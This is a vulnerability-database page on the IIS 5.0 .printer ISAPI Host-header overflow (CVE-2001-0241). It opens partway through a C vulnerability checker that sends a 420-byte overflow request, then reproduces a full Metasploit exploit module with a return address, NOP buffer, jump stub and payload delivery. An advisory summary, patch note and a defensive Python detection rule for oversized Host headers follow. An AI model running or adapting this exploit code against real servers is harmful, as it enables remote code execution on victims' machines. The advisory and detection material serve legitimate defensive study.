        int sock, risp;
        struct sockaddr_in web;
        char buf[50];
        int i = 0;

        if( (sock = socket(AF_INET,SOCK_STREAM,0)) < 0 ) {

                printf("Error occured when I try to create socket\n");
                perror("sock:");

        }

        web.sin_family = AF_INET;
        web.sin_port = htons(PORTA);
        web.sin_addr.s_addr = inet_addr(ip);

        if( connect(sock, (struct sockaddr *)&web, sizeof(web)) < 0 ) {

                printf("I can't connect to %s..is it online?\n", ip);
                perror("connect: ");

        }

        printf("Ok..I'm sending the string...");

        risp = result(sock);

        if( risp == 0 ) {

                printf("The server %s is vulnerable...i think that you have to install a patch! :)\n\n", ip);

                if ( z > 0 ) {

                        sprintf(buf, "| The server %s is vulnerable.!\n", ip);
                        write_file(buf);

                        for( i = 0; i < 50; i++ ) {
                                buf[i] = '\0';
                        }
                }

        } else {

                printf("I'm sorry: the server %s is not vulnerable..change target\n", ip);

                if ( z > 0 ) {

                        sprintf(buf, "| I'm sorry:the server %s is not vulnerable.\n", ip);
                        write_file(buf);

                        for( i = 0; i < 50; i++ ) {
                                buf[i] = '\0';
                        }
                }
        }

        sleep(1);
        close(sock);
        return;

}


int result(int sock) {

        char *expl = "GET /NULL.printer HTTP/1.0\nHost: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n";
        char buf[1024];
        int i = 0;

        for ( i = 0; i< 1024; i++) {
                buf[i] = '\0';
        }

        if( write(sock, expl, strlen(expl)) == -1) {

                printf("Error occured when I try to send exploit...\n");
                perror("write: ");
        }

        if( read(sock, buf, sizeof(buf)) == -1) {

                printf("Error occured when I try to read from sock...\n");
                perror("read: ");

        }

        if( buf == NULL) {
                return 0;
        } else {

        return -1;

        }
}

void write_file(char *buf) {

        fprintf(f, "%s", buf);

        return;

}

void author() {

printf("\n\n\n");
printf("+--------------------------------------------+\n");
printf("|                                            |\n");
printf("|             styx^ checker for              |\n");
printf("|   IIS 5.0 sp1 sp2 ISAPI Buffer Overflows   |\n");
printf("|                                            |\n");
printf("+--------------------------------------------+\n\n");

}

		

- Vulnerability information (20818)

Microsoft IIS 5.0 .printer ISAPI Extension Buffer Overflow Vulnerability (4) (EDBID:20818)
windows remote
2001-05-01 Verified
0 Cyrus The Great
N/A [Download]
source: http://www.securityfocus.com/bid/2674/info
  
Windows 2000 Internet printing ISAPI extension contains msw3prt.dll which handles user requests. Due to an unchecked buffer in msw3prt.dll, a maliciously crafted HTTP .printer request containing approx 420 bytes in the 'Host:' field will allow the execution of arbitrary code. Typically a web server would stop responding in a buffer overflow condition; however, once Windows 2000 detects an unresponsive web server it automatically performs a restart. Therefore, the administrator will be unaware of this attack.
  
* If Web-based Printing has been configured in group policy, attempts to disable or unmap the affected extension via Internet Services Manager will be overridden by the group policy settings. 

http://www.exploit-db.com/sploits/20818.zip		

- Vulnerability information (F82923)

Microsoft IIS 5.0 Printer Host Header Overflow (PacketStormID:F82923)
2009-10-30 00:00:00
H D Moore  metasploit.com
exploit,overflow,protocol
windows,2k
CVE-2001-0241
[Download]

This exploits a buffer overflow in the request processor of the Internet Printing Protocol ISAPI module in IIS. This Metasploit module works against Windows 2000 service pack 0 and 1. If the service stops responding after a successful compromise, run the exploit a couple more times to completely kill the hung process.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS 5.0 Printer Host Header Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in the request processor of
				the Internet Printing Protocol ISAPI module in IIS. This
				module works against Windows 2000 service pack 0 and 1. If
				the service stops responding after a successful compromise,
				run the exploit a couple more times to completely kill the
				hung process.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2001-0241'],
					[ 'OSVDB', '3323'],
					[ 'BID', '2674'],
					[ 'MSB', 'MS01-023'],
					[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 900,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,

				},
			'Targets'        => 
				[
					[ 
						'Windows 2000 English SP0-SP1', 
						{
							'Platform' => 'win',
							'Ret'      => 0x732c45f3,
						},
					],
				],
			'Platform'       => 'win',
			'DisclosureDate' => 'May 1 2001',
			'DefaultTarget' => 0))
			
		register_options(
			[
				Opt::RPORT(80)
			], self.class)			
	end


	def check
		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\n\r\n")
		resp = sock.get_once
		disconnect
		
		if !(resp and resp =~ /Error in web printer/)
			return Exploit::CheckCode::Safe
		end
		
		connect
		sock.put("GET /NULL.printer HTTP/1.0\r\nHost: #{"X"*257}\r\n\r\n")
		resp = sock.get_once
		disconnect
		
		if (resp and resp =~ /locked out/) 
			print_status("The IUSER account is locked out, we can't check")
			return Exploit::CheckCode::Detected
		end
		
		if (resp and resp.index("HTTP/1.1 500") >= 0)
			return Exploit::CheckCode::Vulnerable
		end
		
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		
		buf = make_nops(280)
		buf[268, 4] = [target.ret].pack('V')
		
		# payload is at: [ebx + 96] + 256 + 64
		buf << "\x8b\x4b\x60"        # mov ecx, [ebx + 96]
		buf << "\x80\xc1\x40"        # add cl, 64
		buf << "\x80\xc5\x01"        # add ch, 1
		buf << "\xff\xe1"            # jmp ecx		
	
		sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

		handler
		disconnect
	end

end
    

- Vulnerability information

3323
Microsoft IIS ISAPI .printer Extension Host Header Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Third-party Verified

- Vulnerability description

Microsoft IIS contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable server. The issue is due to the .printer ISAPI (Internet Services Application Programming Interface) Internet Printing Protocol (IPP) filter, handled by \WINNT\System32\msw3prt.dll, containing a buffer overflow. When a buffer of 420 bytes is sent within the HTTP Host: header of a .printer ISAPI request, the buffer is overflowed allowing the attacker to overwrite the EIP register and execute arbitrary code with SYSTEM access.
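A defender-side check for the request shape described above, as an added example that is not part of the original entry or of any tool listed on this page: it flags `.printer` requests whose `Host:` header, or the authority of an absolute request-target, is longer than a hostname can be or holds non-hostname bytes. The 261-byte limit, the function names and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumption (not from the page): a DNS name is at most 255 octets and ":65535"
# adds 6, so anything longer cannot be a legitimate host value.
MAX_HOST_LEN = 255 + 6
HOST_OK = re.compile(rb"[A-Za-z0-9._:\[\]\-]*")
ABSOLUTE_URI = re.compile(rb"^[a-z][a-z0-9+.\-]*://([^/?#]*)(.*)$", re.I | re.S)


def parse_request(raw):
    """Return (request_target, [Host header values]) from raw request bytes."""
    # Accept both CRLF and bare LF line endings.
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(rb"\r?\n", head)
    _method, _, rest = lines[0].partition(b" ")
    target, _, _version = rest.rpartition(b" ")
    if not target:  # request line without an HTTP version
        target = rest
    hosts = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            hosts.append(value.strip())
    return target, hosts


def inspect(raw):
    """Return findings as (source, reason, length); empty list means no match."""
    target, hosts = parse_request(raw)
    authority, path = b"", target
    match = ABSOLUTE_URI.match(target)
    if match:
        authority, path = match.group(1), match.group(2)
    # Only requests routed to the .printer mapping are in scope for this rule.
    if not path.split(b"?", 1)[0].lower().endswith(b".printer"):
        return []
    candidates = [("Host header", h) for h in hosts]
    if authority:
        candidates.append(("request-target authority", authority))
    findings = []
    for source, value in candidates:
        if len(value) > MAX_HOST_LEN:
            findings.append((source, "oversize", len(value)))
        elif not HOST_OK.fullmatch(value):
            findings.append((source, "non-hostname bytes", len(value)))
    return findings


# Constructed sample requests (filler bytes only, no payload).
SAMPLES = {
    "benign": b"GET /lab.printer HTTP/1.1\r\nHost: print.example.test\r\n\r\n",
    "long_host_lf": b"GET /NULL.printer HTTP/1.0\nHost: " + b"A" * 420 + b"\n\n",
    "absolute_uri": b"GET http://" + b"\xff" * 40 + b"/NULL.printer?x HTTP/1.0\r\n\r\n",
    "other_path": b"GET /index.html HTTP/1.0\r\nHost: " + b"A" * 420 + b"\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect(raw))
```

The rule is scoped to the `.printer` mapping, so the same oversize header on `/index.html` is deliberately not reported; a general Host-length rule would belong in a separate check.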

- Timeline

2001-05-01 Unknown
2001-05-07 2001-05-01

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (MS01-023) to address this vulnerability.

- Related references

- Vulnerability author

 

 
